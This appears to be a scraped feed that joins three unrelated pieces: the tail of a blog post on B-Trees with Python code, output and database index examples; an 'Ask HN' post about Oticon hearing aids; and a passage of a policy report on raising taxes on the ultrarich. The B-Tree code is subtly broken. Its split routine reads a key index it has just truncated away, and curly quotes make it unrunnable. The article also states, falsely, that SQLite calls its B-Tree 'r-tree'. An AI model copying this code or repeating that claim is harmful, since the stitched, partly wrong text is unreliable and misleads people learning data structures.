    def _insert_non_full(self, node: BTreeNode, key: int):
        “”“
        Insert key into a node that is not full.

        Recursively finds the correct leaf and inserts.
        “”“
        i = len(node.keys) - 1

        if node.is_leaf:
            # Insert into sorted position
            node.keys.append(None)  # Make space
            while i >= 0 and key < node.keys[i]:
                node.keys[i + 1] = node.keys[i]
                i -= 1
            node.keys[i + 1] = key
        else:
            # Find child to insert into
            while i >= 0 and key < node.keys[i]:
                i -= 1
            i += 1

            # Split child if it’s full
            if len(node.children[i].keys) >= self.order - 1:
                self._split_child(node, i)
                if key > node.keys[i]:
                    i += 1

            self._insert_non_full(node.children[i], key)

    def _split_child(self, parent: BTreeNode, child_index: int):
        “”“
        Split a full child node into two nodes.

        Args:
            parent: Parent node containing the full child
            child_index: Index of the full child in parent.children

        Algorithm:
            1. Create new sibling node
            2. Move half of keys from full child to sibling
            3. Promote middle key to parent
            4. Update parent’s children list
        “”“
        full_child = parent.children[child_index]
        new_sibling = BTreeNode(is_leaf=full_child.is_leaf)

        mid = (self.order - 1) // 2

        # Move half the keys to new sibling
        new_sibling.keys = full_child.keys[mid + 1:]
        full_child.keys = full_child.keys[:mid]

        # Move half the children if not a leaf
        if not full_child.is_leaf:
            new_sibling.children = full_child.children[mid + 1:]
            full_child.children = full_child.children[:mid + 1]

        # Promote middle key to parent
        promoted_key = full_child.keys[mid] if full_child.is_leaf else full_child.keys[mid]
        parent.keys.insert(child_index, promoted_key)
        parent.children.insert(child_index + 1, new_sibling)

    def print_tree(self, node: Optional[BTreeNode] = None, level: int = 0):
        “”“
        Print tree structure for debugging.
        “”“
        if node is None:
            node = self.root

        print(”  “ * level + f”Level {level}: {node.keys}”)
        if not node.is_leaf:
            for child in node.children:
                self.print_tree(child, level + 1)


# Example usage and demonstration
if __name__ == “__main__”:
    # Create B-Tree with order 5 (max 4 keys per node)
    btree = BTree(order=5)

    # Insert keys
    keys = [10, 20, 5, 6, 12, 30, 7, 17, 3, 16, 21, 24, 25, 26, 27]
    print(”Inserting keys:”, keys)
    for key in keys:
        btree.insert(key)

    print(”\nB-Tree structure:”)
    btree.print_tree()

    # Search for keys
    print(”\nSearching for keys:”)
    for search_key in [6, 16, 21, 100]:
        result = btree.search(search_key)
        if result:
            print(f”  Key {search_key}: FOUND”)
        else:
            print(f”  Key {search_key}: NOT FOUND”)

    # Demonstrate disk I/O count
    print(”\n--- Performance Analysis ---”)
    print(f”Tree order (fanout): {btree.order}”)
    print(f”Max keys per node: {btree.order - 1}”)

    # Estimate tree height for large datasets
    def estimate_height(num_records: int, fanout: int) -> int:
        “”“Estimate tree height for given number of records and fanout.”“”
        import math
        return math.ceil(math.log(num_records, fanout))

    datasets = [
        (”1 thousand”, 1_000),
        (”1 million”, 1_000_000),
        (”1 billion”, 1_000_000_000),
    ]

    fanouts = [5, 100, 1000]

    print(”\nEstimated tree height (= disk seeks):”)
    print(f”{’Dataset’:<15} {’Fanout=5’:<10} {’Fanout=100’:<12} {’Fanout=1000’:<12}”)
    for name, size in datasets:
        heights = [estimate_height(size, f) for f in fanouts]
        print(f”{name:<15} {heights[0]:<10} {heights[1]:<12} {heights[2]:<12}”)

    print(”\nDisk access time on HDD (10ms per seek):”)
    print(f”{’Dataset’:<15} {’Fanout=5’:<10} {’Fanout=100’:<12} {’Fanout=1000’:<12}”)
    for name, size in datasets:
        times = [f”{estimate_height(size, f) * 10}ms” for f in fanouts]
        print(f”{name:<15} {times[0]:<10} {times[1]:<12} {times[2]:<12}”)

Output:

Inserting keys: [10, 20, 5, 6, 12, 30, 7, 17, 3, 16, 21, 24, 25, 26, 27]

B-Tree structure:
Level 0: [12, 20, 25]
  Level 1: [3, 5, 6, 7, 10]
  Level 1: [16, 17]
  Level 1: [21, 24]
  Level 1: [26, 27, 30]

Searching for keys:
  Key 6: FOUND
  Key 16: FOUND
  Key 21: FOUND
  Key 100: NOT FOUND

--- Performance Analysis ---
Tree order (fanout): 5
Max keys per node: 4

Estimated tree height (= disk seeks):
Dataset         Fanout=5   Fanout=100   Fanout=1000
1 thousand      5          2            1
1 million       9          3            2
1 billion       13         5            3

Disk access time on HDD (10ms per seek):
Dataset         Fanout=5   Fanout=100   Fanout=1000
1 thousand      50ms       20ms         10ms
1 million       90ms       30ms         20ms
1 billion       130ms      50ms         30ms

Why this implementation works:

  • Each node stores up to order - 1 keys

  • Split operation maintains the B-Tree invariants

  • Binary search within nodes reduces comparisons

  • Tree height stays logarithmic

When you insert a key into a full leaf node, the node must split.

Split algorithm:

  1. Find the midpoint of the full node

  2. Create a new sibling node

  3. Move half the keys to the new node

  4. Promote the middle key to the parent

  5. If parent is full, split it recursively

Figure 3: Node split during insertion. The full node is split at the midpoint, and the middle key (30) is promoted to the parent.

When splits propagate to the root:

  • The root is split into two nodes

  • A new root is created with one key (the promoted key from the old root)

  • Tree height increases by 1

This is the only way tree height increases in a B-Tree. B-Trees grow upward from the leaves, not downward from the root.

When you delete a key from a node and it becomes too empty (below 50% capacity), it merges with a sibling.

Merge algorithm:

  1. Copy all keys from right sibling to left sibling

  2. Demote the separator key from parent into the merged node

  3. Remove the right sibling

  4. If parent becomes too empty, merge it recursively

Figure 4: Node merge during deletion. When the right node becomes too empty, it merges with the left node, pulling the separator key from the parent.

When merges propagate to the root:

  • If the root has only one child after a merge, that child becomes the new root

  • Tree height decreases by 1

Splits and merges keep the tree balanced. All leaf nodes remain at the same depth, ensuring consistent query performance.

Time complexity: O(log n)

For a tree with n keys and fanout f:

  • Tree height: log_f(n)

  • Binary search per node: log₂(f)

  • Total comparisons: log_f(n) × log₂(f) = O(log n)

Disk I/O: log_f(n) disk reads (one per level)

Time complexity: O(log n)

  • Lookup to find insertion point: O(log n)

  • Insert into leaf: O(f) to shift keys

  • Split if necessary: O(f) to move keys

  • Splits propagate up: O(log n) levels in worst case

Disk I/O: O(log n) disk reads + O(log n) disk writes

Time complexity: O(log n)

  • Lookup to find key: O(log n)

  • Delete from leaf: O(f) to shift keys

  • Merge if necessary: O(f) to move keys

  • Merges propagate up: O(log n) levels in worst case

Disk I/O: O(log n) disk reads + O(log n) disk writes

Space: O(n)

Each key is stored once. Internal nodes add overhead (pointers and separator keys), but this is typically 10-20% of data size.

Occupancy: Nodes are typically 50-90% full. Higher fanout improves space efficiency because pointer overhead becomes proportionally smaller.

Every major database uses B-Trees (or B+-Trees) for indexes.

InnoDB uses B+-Trees for:

  • Primary key index (clustered index): Stores actual row data in leaf nodes

  • Secondary indexes : Store pointers to primary key in leaf nodes

InnoDB B-Tree configuration:

  • Page size: 16 KB (default)

  • Fanout: ~100-200 depending on key size

  • Tree height for 1 million rows: 3-4 levels

Example:

-- Create table with primary key
CREATE TABLE users (
    id INT PRIMARY KEY,
    name VARCHAR(100),
    email VARCHAR(100)
) ENGINE=InnoDB;

-- Primary key automatically creates a clustered B+-Tree index
-- Leaf nodes contain the actual row data
-- Tree structure: id=1 stored with name and email in leaf

-- Create secondary index on email
CREATE INDEX idx_email ON users(email);

-- Secondary index is a separate B+-Tree
-- Leaf nodes contain email → id mappings
-- To fetch full row: lookup email in idx_email → get id → lookup id in primary key

InnoDB query performance:

-- Fast: Uses B-Tree index
SELECT * FROM users WHERE id = 12345;
-- Disk I/O: 3-4 reads (tree height)

-- Slow: Full table scan
SELECT * FROM users WHERE name = ‘Alice’;
-- Disk I/O: 10,000+ reads (scan all pages)

-- Fast: Uses secondary index
SELECT * FROM users WHERE email = ‘alice@example.com’;
-- Disk I/O: 6-8 reads (3-4 for idx_email + 3-4 for primary key)

PostgreSQL uses B-Trees as the default index type.

PostgreSQL B-Tree configuration:

  • Page size: 8 KB (default)

  • Fanout: ~50-100 depending on key size

  • Supports multiple index types (B-Tree, Hash, GiST, GIN, BRIN), but B-Tree is default

Example:

-- Default index is B-Tree
CREATE INDEX idx_user_id ON users(id);

-- Explicitly specify B-Tree
CREATE INDEX idx_user_email ON users USING BTREE(email);

-- View index structure
SELECT * FROM pg_indexes WHERE tablename = ‘users’;

SQLite uses B-Trees for both tables and indexes.

SQLite B-Tree configuration:

  • Page size: 4 KB (default, configurable to 64 KB)

  • Fanout: ~50-100

  • All data is stored in B-Trees (no separate heap storage)

Interesting fact: SQLite calls its B-Tree implementation “r-tree” for historical reasons, but it’s actually a B+-Tree.

MongoDB’s WiredTiger storage engine uses B-Trees for indexes.

WiredTiger B-Tree configuration:

  • Internal page size: 4 KB (default)

  • Leaf page size: 32 KB (default)

  • Fanout: ~100-200

  • Supports prefix compression to increase fanout

Example:

// MongoDB creates B-Tree index on _id by default
db.users.insertOne({ _id: 1, name: “Alice”, email: “alice@example.com” });

// Create secondary index (B-Tree)
db.users.createIndex({ email: 1 });

// Query uses B-Tree index
db.users.find({ email: “alice@example.com” });
// Disk I/O: 3-4 reads (tree height)

// Explain shows index usage
db.users.find({ email: “alice@example.com” }).explain();
// Output: “indexName”: “email_1”, “stage”: “IXSCAN”

B-Trees are not perfect. Here’s when they struggle:

Every insert may trigger splits all the way to the root. In the worst case:

  • Insert 1 key → split leaf → split parent → split grandparent → split root

  • One logical write becomes 4+ physical writes

Example: Inserting 1 million keys with frequent splits:

  • Logical writes: 1 million

  • Physical writes (with splits): 2-3 million

  • Write amplification: 2-3x

Alternative: LSM-Trees (Log-Structured Merge Trees) used by RocksDB, Cassandra, and LevelDB. LSM-Trees batch writes in memory and flush sequentially to disk, avoiding in-place updates.

B-Trees are optimized for range queries on the indexed key, but struggle with multi-column range queries.

Example:

-- Fast: Range query on indexed column
SELECT * FROM orders WHERE order_date BETWEEN ‘2024-01-01’ AND ‘2024-12-31’;
-- B-Tree traverses leaf nodes sequentially (leaf nodes are linked)

-- Slow: Range query on non-indexed column
SELECT * FROM orders WHERE total_amount BETWEEN 100 AND 200;
-- Must scan entire table (no index on total_amount)

-- Slow: Multi-column range query
CREATE INDEX idx_date_amount ON orders(order_date, total_amount);
SELECT * FROM orders WHERE order_date > ‘2024-01-01’ AND total_amount > 100;
-- B-Tree can use order_date range, but must filter total_amount in memory

Alternative: Multi-dimensional indexes like R-Trees (for spatial data) or hybrid indexes.

To avoid disk I/O, databases cache frequently accessed B-Tree nodes in memory. For a large database:

  • 1 billion records

  • Tree height: 4 levels

  • Internal nodes: ~1 million

  • Cache size: ~16 GB (to cache all internal nodes)

Rule of thumb: Plan for 10-20% of your database size in RAM for B-Tree caches.

After many inserts and deletes, B-Tree nodes may be only 50-60% full. This wastes space and increases tree height.

Solution: Periodic VACUUM (PostgreSQL) or OPTIMIZE TABLE (MySQL) to rebuild B-Trees.

Example:

-- PostgreSQL: Rebuild table and indexes
VACUUM FULL users;

-- MySQL: Optimize table (rebuilds B-Tree)
OPTIMIZE TABLE users;

B-Trees require locking during splits and merges. In high-concurrency workloads, lock contention can bottleneck writes.

Solution: Latch-free B-Trees (used in modern databases like Microsoft SQL Server) or MVCC (Multi-Version Concurrency Control).

B-Trees are excellent for disk-based sorted data, but not always optimal:

If you’re doing 100,000 writes/sec with few reads, LSM-Trees outperform B-Trees.

Comparison:

Examples:

  • B-Tree: MySQL, PostgreSQL, SQLite

  • LSM-Tree: RocksDB, Cassandra, LevelDB

If your entire dataset fits in RAM, B-Trees add unnecessary complexity. Hash indexes or skip lists are simpler and faster.

Comparison:

Examples:

  • Hash index: Memcached, Redis hashes

  • Skip list: Redis sorted sets

For large analytical queries scanning millions of rows, columnar storage (e.g., Parquet, ORC) outperforms B-Trees.

Comparison:

Examples:

  • Row storage (B-Tree): MySQL, PostgreSQL

  • Columnar storage: Parquet (used by Snowflake, BigQuery), ORC (used by Hive)

After 50+ years, B-Trees remain the dominant on-disk data structure because they:

  • Minimize disk I/O: High fanout reduces tree height

  • Balance automatically: Splits and merges keep all leaves at the same depth

  • Support range queries: Sorted keys and leaf-level links enable efficient scans

  • Work on any disk: Optimized for both HDDs (sequential I/O) and SSDs (block-level access)

Key insight: B-Trees match the constraints of disk storage. Since the smallest I/O unit is a block, B-Trees pack as much data as possible into each block. This simple idea—maximizing fanout to minimize height—makes databases fast.

When to use B-Trees:

  • Disk-based storage (database indexes)

  • Frequent reads and moderate writes

  • Range queries on sorted data

  • General-purpose OLTP workloads

When to consider alternatives:

  • Write-heavy workloads (LSM-Trees)

  • In-memory data (hash indexes, skip lists)

  • Analytical queries (columnar storage)

Every time you query your database and get a result in milliseconds, thank the B-Tree.

This article is based on Chapter 2 (”B-Tree Basics”) of Database Internals: A Deep Dive into How Distributed Data Systems Work by Alex Petrov (O’Reilly, 2019).

Additional resources:

Books:

  • Petrov, A. (2019). Database Internals: A Deep Dive into How Distributed Data Systems Work . O’Reilly Media. ISBN: 978-1492040347

  • Knuth, D. E. (1998). The Art of Computer Programming, Volume 3: Sorting and Searching (2nd Ed.) . Addison-Wesley. ISBN: 978-0201896855

  • Graefe, G. (2011). Modern B-Tree Techniques . Now Publishers. ISBN: 978-1601984197

Thanks for reading!

If you found this deep-dive helpful, subscribe to m3mo Bytes for more technical explorations of databases, distributed systems, and data structures.

Have you worked with B-Trees or database indexes? What performance challenges have you faced? Share your experiences in the comments—I read and respond to every one.

  • What database systems have you worked with? (MySQL, PostgreSQL, MongoDB?)

  • Have you encountered B-Tree performance bottlenecks in production?

  • What index strategies have worked well for your workload?

  • Have you compared B-Trees to LSM-Trees for write-heavy workloads?

  • Any interesting query optimization stories with indexes?

Drop a comment below.

Discussion about this post

Ask HN: Hearing aid wearers, what's hot?

Hacker News
news.ycombinator.com
2025-11-24 02:25:39
Comments...
Original Article

I have worn hearing aids since childhood in the '90s. Moderate sloping to profound loss. Been through all the tech since the equalized analog era.

For a while now, like the last 15 to 20 years, since hearing aids went DSP, I had not been much impressed by each new generation. At the risk of sounding like a bit of an advertisement, that changed this year.

I have the new Oticon Intent. RIC style aid. They have some of the best spatial awareness I've experienced. They're capable of quite a lot of directionality - accelerometer and three microphones in each. I had to have the intensity of the directionality turned down a bit. It was startling me when I turned my head and I wasn't hearing things behind me enough. But that's at the expense of less signal due to more environmental noise.

The machine-learning based noise reduction is an improvement over the previous generations, too.

They have a music mode. It drops all the speech remapping and noise reduction and just makes it feel loud. It's some sort of perceptual algorithm: in my case as I turn up the volume it gets more and more treble, because only at the loudest volumes would I hear those high frequencies. All while being power limited at 95 dB SPL so I know I'm not blowing my ears. It's nice to not worry about if it's too loud.

Raising Taxes on the Ultrarich

Portside
portside.org
2025-11-24 02:22:55
Raising Taxes on the Ultrarich Ira Sun, 11/23/2025 - 21:22 ...
Original Article

Summary

The public has supported raising taxes on the ultrarich and corporations for years, but policymakers have not responded. Small increases in taxes on the rich that were instituted during times of Democratic control of Congress and the White House have been consistently swamped by larger tax cuts passed during times of Republican control. This was most recently reflected in the massive budget reconciliation bill pushed through Congress exclusively by Republicans and signed by President Trump. This bill extended the large tax cuts first passed by Trump in 2017 alongside huge new cuts in public spending. This one-step-forward, two-steps-back dynamic has led to large shortfalls of federal revenue relative to both existing and needed public spending.

Raising taxes on the ultrarich and corporations is necessary for both economic and political reasons. Economically, preserving and expanding needed social insurance and public investments will require more revenue. Politically, targeting the ultrarich and corporations as sources of the first tranche of this needed new revenue can restore faith in the broader public that policymakers can force the rich and powerful to make a fair contribution. Once the public has more faith in the overall fairness of the tax system, future debates about taxes can happen on much more constructive ground.

Policymakers should adopt the following measures:

  • Tax wealth (or the income derived from wealth) at rates closer to those applied to labor earnings. One way to do this is to impose a wealth tax on the top 0.1% of wealthy households.
  • Restore effective taxation of large wealth dynasties. One way to do this would be to convert the estate tax to a progressive inheritance tax.
  • Impose a high-income surtax on millionaires.
  • Raise the top marginal income tax rate back to pre-2017 levels.
  • Close tax loopholes for the ultrarich and corporations.

Introduction

The debate over taxation in the U.S. is in an unhealthy state. The public is deeply distrustful of policymakers and doesn’t believe that they will ever put typical families’ interests over those of the rich and powerful. In tax policy debates, this means that people are often highly skeptical of any proposed tax increases, even when they are told it will affect only (or, at least, overwhelmingly) the very rich. People are also so hungry to see any benefit at all, no matter how small, that they are often willing to allow huge tax cuts for the ultrarich in tax cut packages if those packages include any benefit to them as well. The result has been a continued downward ratchet of tax rates across the income distribution. 1 This is a terrible political dynamic for U.S. economic policy, given the pressing national needs for more revenue.

As countries get richer and older, the need for a larger public sector naturally grows. 2 Yet the share of national income collected in taxes by the U.S. government has stagnated since the late 1970s. This has left both revenue and public spending in the United States at levels far below those of advanced country peers. 3 This stifling of resources available for the public sector is not only inefficient but has led to frustration over its inability to perform basic functions. The political root of this suppression of resources for the public sector is a series of successful Republican pushes to lower tax rates for the richest households and corporations. This attempt to use tax policy to increase inequality has amplified other policy efforts that have increased inequality in pre-tax incomes, leading to suppressed growth in incomes and declining living standards for low- and middle-income households and a degraded public sector. 4

In recent decades the dominant strategy for many on the center–left to combat the public’s tax skepticism is to pair tax increases with spending increases for programs that lawmakers hope will be popular enough to justify the taxes. This strategy has worked in the sense that some tax increases have been passed in the same legislation that paid for valuable expansions of income support, social insurance, and public investment programs in recent years. But this strategy has not stopped the damaging political dynamic leading to the sustained downward ratchet of tax revenue and the tax rates granted to the ultrarich and corporations. 5

Part of the problem with a strategy of trying to attach tax increases to allegedly more popular spending increases is that it takes time for spending programs to become popular. The Affordable Care Act (ACA), for example, was not particularly popular in the year of its passage but has survived numerous efforts to dislodge it and has seemingly become more popular over time. Conversely, the expanded Child Tax Credit (CTC) that was in effect in 2021 and cut child poverty in half only lasted a single year, so there was little organic public pressure on Congress to ensure it continued.

In this report, we suggest another strategy for policymakers looking to build confidence in the broader public that tax policy can be made fairer: Target stand-alone tax increases unambiguously focused on ultrarich households and corporations as the first priority of fiscal policy. The revenue raised from this set of confidence-building measures can be explicitly aimed at closing the nation’s fiscal gap (the combination of tax increases or spending cuts needed to stabilize the ratio of public debt to national income). 6 Once this gap has been closed with just highly progressive taxes, the public debate about the taxes needed to support valuable public investments and welfare state expansions should be on much more fruitful ground.

This approach takes seriously the work of scholars like Williamson (2017), who argue that the U.S. public is not rigidly “anti-tax.” Indeed, this public often views taxpaying as a civic responsibility and moral virtue. Yet they have become convinced that too many of their fellow citizens are not making a fair and adequate contribution. Part of this perception rests on underestimating the taxes paid by the poor and working people, but a good part of this perception also rests on the accurate impression that many rich households and corporations are not paying their fair share. Policy can change this latter perception, particularly if the policy is explicitly identified with ensuring that the rich and corporations—and only the rich and corporations—will see their taxes increase.

The rest of this report describes a number of tax policy changes that would raise revenue from the rich and corporations with extremely small (often zero) spillover into higher taxes for anybody else. It also provides rough revenue estimates of how much each could raise. It is not exhaustive, but it demonstrates that the nation’s current fiscal gap could certainly be closed with only taxes on the very rich. Making this policy agenda and target explicit could go a long way to restoring trust and improving the quality of the debate about taxes.

Targeting the ultrarich

The vast majority (often 100%) of the tax policy changes discussed below would only affect the taxes paid by the top 1% or above (those making well over $563,000 in adjusted gross income in 2024). Many of the taxes—and the vast majority of the revenue raised—will actually come from households earning well above this amount. We will be more specific about the incidence of each tax in the detailed descriptions below. The tax policy changes fall into two categories: increasing the tax rates the rich and ultrarich pay and closing the tax loopholes they disproportionately benefit from. We first present the tax rate changes, and we list them in declining order of progressivity.

Both the rate changes and the loophole closers disproportionately focus on income derived from wealth. By far the biggest reason why rich households’ tax contributions are smaller than many Americans think is appropriate has to do with rich households’ source of income. So much of these households’ income derives from wealth, and the U.S. federal tax system taxes income derived from wealth more lightly than income derived from work. If policymakers are unwilling to raise taxes on income derived from wealth, the tax system can never be made as fair as it needs to be.

Levying a wealth tax on the top 0.1% or above of wealthy households

The WhyNot Initiative (WNI) on behalf of Tax the Greedy Billionaires (TGB) has proposed a wealth tax of 5% on wealth over $50 million, with rates rising smoothly until they hit 10% at $250 million in wealth and then plateauing. With this much wealth, even a household making just a 1% return on their wealth holdings would receive an income that would put them in the top 1% of the income distribution. A more realistic rate of return (say, closer to 7%) would have them in the top 0.1% of income.

The $50 million threshold roughly hits at the top 0.1% of net worth among U.S. families, so this tax is, by construction, extremely progressive—only those universally acknowledged as extremely wealthy would pay a penny in additional tax. The WNI proposal also imposes a steep exit tax, should anybody subject to the tax attempt to renounce their U.S. citizenship to avoid paying it.

The Tax Policy Center (TPC) has estimated that the WNI wealth tax could raise $6.8 trillion in additional net revenue over the next decade, an average of $680 billion annually. In their estimate, the TPC has accounted for evasion attempts and the “externality” of reduced taxes likely to be collected on income flows stemming from wealth holdings. Despite accounting for these considerations, the $6.8 trillion in revenue over the next decade could completely close the nation’s current estimated fiscal gap.

A key consideration in the long-run sustainability of revenue collected through a wealth tax is how quickly the tax itself leads to a decline in wealth for those above the thresholds of the tax. If, for example, the tax rate itself exceeded the gross rate of return to wealth, wealth stocks above the thresholds set by the tax would begin shrinking, and there would be less wealth to tax over time. The Tax Policy Center’s estimate includes a simulation of this decumulation process, assuming an 8.5% rate of return. 7 It finds only very slow rates of decumulation.

Other simulation results (like those in Saez and Zucman 2019b) find faster decumulation for wealth taxes as high as this, but even their findings would still support the significant revenue potential of a wealth tax targeted at sustainability. Whereas the WNI wealth tax raises roughly 2.2% of GDP over the next 10 years, the Saez and Zucman (2019a) results highlight that over half this much could essentially be raised in perpetuity. 8

It is important to note that even if revenue raised from any given wealth tax came in lower than expected due to the decumulation of wealth, this decumulation is itself highly socially desirable. The wealth would not be extinguished. It would instead accumulate to other households throughout society. An analogy is carbon taxes targeted at lowering greenhouse gas emissions. If a carbon tax were implemented and the revenue it raised steadily fell over time, this would be a sign of success, as the primary virtue of such a tax is not the long-run revenue it can raise but the behavioral changes it can spur, such as switching to less carbon-intensive forms of energy generation and use.

The benefits from wealth decumulation could be profound. For one, much of the rise in wealth in recent decades has been the result of a zero-sum transfer of income claims away from workers and toward capital owners (Greenwald, Lettau, and Ludvigson 2025). To the degree that higher wealth taxes make these zero-sum transfers less desirable for privileged economic actors, the imperative to keep wages suppressed and profits higher will be sapped, leading to a broader distribution of the gains of economic growth.

Further, highly concentrated wealth leads naturally to highly concentrated political power, eroding the ability of typical families to have their voices heard in important political debates (Page, Bartels, and Seawright 2013). Studies show that popular support for democratic forms of government is weaker in more unequal societies, demonstrating that a greater concentration of wealth can lead to the erosion of democracy (Rau and Stokes 2024).

Converting the estate tax to a progressive inheritance tax

The estate tax in the United States currently only applies to estates of more than $11.4 million. At the end of 2025 it would have reverted to pre-2017 levels of roughly $7 million, but the Republican budget reconciliation bill passed in 2025 will raise it to a level more than twice as high starting in 2026—at $15 million. The 40% estate tax rate applies on values above these thresholds.

The estate tax threshold has been increased significantly since 2000, with changes in 2001, 2012, 2017, and 2025 all providing large increases. In 2000 the threshold for exemption was under $1 million, and the rate was 55%. If the 2000 threshold were simply updated for inflation, it would have been $1.3 million today, instead of $11.4 million. At this $1.3 million threshold and with a 55% rate, the estate tax would raise roughly $75 billion more in revenue this year than it is currently projected to. 9 In short, our commitment to taxing wealthy estates and their heirs has eroded substantially in recent decades.

Batchelder (2020) proposes a new tax on inheritances that would replace the estate tax. Batchelder’s inheritance tax would not fall on the total value of the estate, but simply the portion of it inherited by individual heirs. Her proposal is to tax inheritances of various thresholds as ordinary income. Because the tax would be triggered by the lifetime level of gifts and inheritances, it cannot be avoided just by using estate planning to time these bequests and gifts. For a threshold of $1 million, the tax would raise roughly 0.35% of gross domestic product annually, or roughly $1 trillion over the next decade.

An inheritance tax is naturally more progressive than an estate tax. To see why, imagine an estate of $5 million that faced 2000-era estate tax rules. An estate tax would lower the value of the inheritance to all heirs by an amount proportional to the tax. Conversely, under an inheritance tax, the effective rate of the tax felt by heirs would be significantly different if the estate was spread among 10 heirs (each receiving $500,000 and, hence, not even being subject to the Batchelder inheritance tax that starts at $1 million) versus being spread among two heirs (each receiving $2.5 million and paying an inheritance tax). Fewer heirs for a given estate value imply a larger inheritance and, hence, a higher inheritance tax (if the inheritance exceeds the tax’s threshold).

Imposing a high-income surtax on millionaires

Probably the most straightforward way to tightly target a tax on a small slice of the richest taxpayers is to impose a high-income surtax. A surtax is simply an across-the-board levy on all types of income (ordinary income, business income, dividends, and capital gains) above a certain threshold. As such, there is zero possibility that lower-income taxpayers could inadvertently face any additional tax obligation because of it.

A version of such a high-income surtax was actually a key proposed financing source for early legislative versions of the Affordable Care Act. The bill that passed the House of Representatives included such a surtax. 10 This surtax was replaced with other revenue sources during the reconciliation process between the House and Senate versions.

One proposal is to enact a 10% surtax on incomes over $1 million. This would affect well under 1% of households (closer to 0.5%). Using data from the Statistics of Income (SOI) of the Internal Revenue Service (IRS), we find that roughly $1.55 trillion in adjusted gross income sat over this $1 million threshold among U.S. households in 2019. 11 A purely static estimate with no behavioral effects, hence, would argue that $155 billion annually (10% of this $1.55 trillion) could be raised from this surcharge. In tax scoring models (like that of the Tax Policy Center or the Joint Committee on Taxation), behavioral effects tend to reduce estimates roughly 25% below such static estimates. Applying such a discount would still suggest that the revenue potential of a high-income surtax with a $1 million threshold could be $1.5 trillion over the next decade.

Raising the top marginal income tax rate back to pre-TCJA levels

During the Clinton and Obama administrations, the top marginal tax rate on ordinary income was increased to 39.6%. During the George W. Bush and the first Donald Trump administrations, it was reduced and currently sits at 37%. This lower marginal top rate would have expired at the end of 2025, but the Republican budget reconciliation bill, passed by Congress and signed by Trump in July 2025, ensured that it would stay at 37%.

In 2025 the bracket that this top tax rate applies to will begin at $626,350 for single filers and joint filers. This is well under 1% of taxpayers. If the bracket for top tax rates was dropped to $400,000 and the rate was raised to 39.6%, the Tax Policy Center has estimated that this could raise roughly $360 billion over the next decade. Earlier in 2025, there were reports that Republicans in Congress were thinking about letting the top tax rate revert to the level it was at before the 2017 Tax Cuts and Jobs Act (TCJA). This was touted as members of Congress breaking with their party’s orthodoxy and actually taxing the rich. On the contrary, the new top marginal tax rate now applies to joint filers at an even lower level than pre-TCJA rates.

As can be seen in Table 1 , pushing the top marginal rate on ordinary income to pre-TCJA levels is one of the weakest tools we have for raising revenue from the rich. The reason is simple. A large majority of the income of the rich is not ordinary income; it is income derived from capital and wealth, and, hence, only changing the tax rate on ordinary income leaves this dominant income form of the rich untouched.

Corporate tax rate increases

In 2017 the TCJA lowered the top rate in the corporate income tax from 35% to 21%, and the 2025 Republican budget reconciliation bill extended that lower 21% rate. The 35% statutory rate that existed pre-TCJA was far higher than the effective rate actually paid by corporations. Significant loopholes in the corporate tax code allowed even highly profitable companies to pay far less than the 35% statutory rate.

But at the same time the TCJA lowered the statutory rate, it did little to reduce loopholes—the gap between effective and statutory rates after the TCJA’s passage remains very large. 12 Clausing and Sarin (2023) have estimated that each 1 percentage point increase in the top statutory tax rate faced by corporations raises over $15 billion in the first years of the 10-year budget window. Raising today’s 21% top rate back to the 35% rate that prevailed before the TCJA would, hence, raise roughly $2.6 trillion over the next decade.

The immediate legal incidence of corporate taxes falls on corporations, the legal entities responsible for paying the taxes. However, the economic incidence is subject to more debate. The current majority opinion of tax policy experts and official scorekeepers like the Joint Tax Committee (JTC) is that owners of corporations (who skew toward the very wealthy) bear most of the burden of corporate tax changes. 13 But some small share of the corporate tax rate’s incidence is often assigned to workers’ wages, as there are some (speculative) reasons to think a higher corporate tax rate leads in the long run to lower wage income. The economic reasoning is that if the higher corporate tax rates lead to less economywide investment in tangible structures, equipment, and intellectual property, then this could slow economywide productivity growth. This slower productivity growth could, in turn, reduce wage growth for workers.

However, newer research highlights that there are good reasons to think that corporate tax rate increases have zero—or even positive—effects on private investment in structures, equipment, and intellectual property. Brun, Gonzalez, and Montecino (2025, forthcoming) argue that once one accounts for market power (either in product or labor markets) of corporations, corporate taxes fall, in part, on nonreproducible monopoly rents. To provide an example, a large share of Amazon’s profits is not just due to the size of the firm’s capital stock but its considerable monopoly power in many business segments. This market power allows them to charge higher prices than they could in competitive markets, and these excess prices represent a pure zero-sum transfer from consumers, not a normal return to investment.

Increasing taxes on these monopoly rents can reduce stock market valuations of firms and actually lower the hurdle rate for potential competitors assessing whether to make investments in productivity-enhancing capital. This can actually boost investment and productivity economywide, and if investment and productivity rise (or just do not fall) in response to corporate tax increases, this implies that none of the economic incidence of a corporate tax increase falls on anybody but the owners of corporations.

In short, despite some mild controversy, it seems very safe to assume that increases in the corporate income tax rate both are and would be perceived by the public as extremely progressive.

Closing tax loopholes that the ultrarich and corporations use

As noted above, it’s not just falling tax rates that have led to revenue stagnation in recent decades. There has also been an erosion of tax bases. Growing loopholes and increasingly aggressive tax evasion strategies have put more and more income out of the reach of revenue collectors. It goes almost without saying that the vast majority of revenue escaping through these loopholes and aggressive tax evasion strategies constitutes the income of the very rich and corporations.

These types of loopholes are unavailable to typical working families because their incomes are reported to the Internal Revenue Service. Typical working families rely on wage income, which is reported to the penny to the IRS, and families pay their legally obligated tax amount. Income forms earned by the ultrarich, however, often have very spotty IRS reporting requirements, and this aids in the evasion and reclassification of income flows to ensure the ultrarich are taxed at the lowest rates. 14 Shoring up tax bases by closing loopholes and engaging in more robust enforcement are key priorities for ensuring the very rich pay a fair and substantial contribution to the nation’s revenue needs.

Closing loopholes that allow wealth gains and transfers between generations to escape taxation

The wealthy use a number of strategies to escape taxation of the income they generate and to allow assets to be transferred to their heirs. Below we discuss three such strategies and provide a score for a consolidated package of reforms aimed at stopping this class of tax strategies—$340 billion over the next decade.

Ending the step-up in basis upon death or transfer of assets

This is best explained with an example. Say that somebody bought shares of a corporation’s stock in the early 1980s for $1 per share. They held onto it for decades until it reached $501 per share. Since they never realized this capital gain by selling the stock, they were never taxed on their growing wealth. Now, say that they transferred these stock holdings to their children decades later. Because it is no longer the original buyer’s property, it would not be assessed as part of an estate subject to the estate tax. If their children subsequently sold the stock, current law would allow a step-up in basis, which means the capital gain they earned from selling the stock would only be taxed on the gain over and above the $501 per share price that prevailed when they received the stock , not the original $1 per share price.

